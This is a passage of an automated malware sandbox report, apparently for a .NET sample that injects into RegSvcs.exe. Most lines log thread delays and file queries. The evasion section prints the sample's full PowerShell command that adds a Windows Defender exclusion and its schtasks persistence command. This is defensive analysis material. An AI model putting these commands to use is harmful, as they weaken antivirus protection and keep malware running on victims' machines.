                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595716
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595499
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595171
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594624
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8009Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1530Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7004
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2849
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe TID: 7728Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 8044Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 8044Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exe TID: 8176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599326Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598999Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598124Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597685Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597567Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597452Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597233Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596905Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596577Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596249Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595155Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599808
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599461
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599247
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598921
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598593
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598465
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598249
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597474
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597249
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596921
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596593
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596374
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595827
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595716
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595499
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595171
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594624
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515
                Source: svchost.exe, 00000005.00000002.2856343026.000001BE7802B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2856841779.000001BE7D659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2856758206.000001BE7D642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: RegSvcs.exe, 0000000B.00000002.3643715555.00000000009B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll <
                Source: RegSvcs.exe, 00000006.00000002.3644950163.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E9668 LdrInitializeThunk,6_2_063E9668
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe"Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 892008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 76E008Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpE4F1.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEF03.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
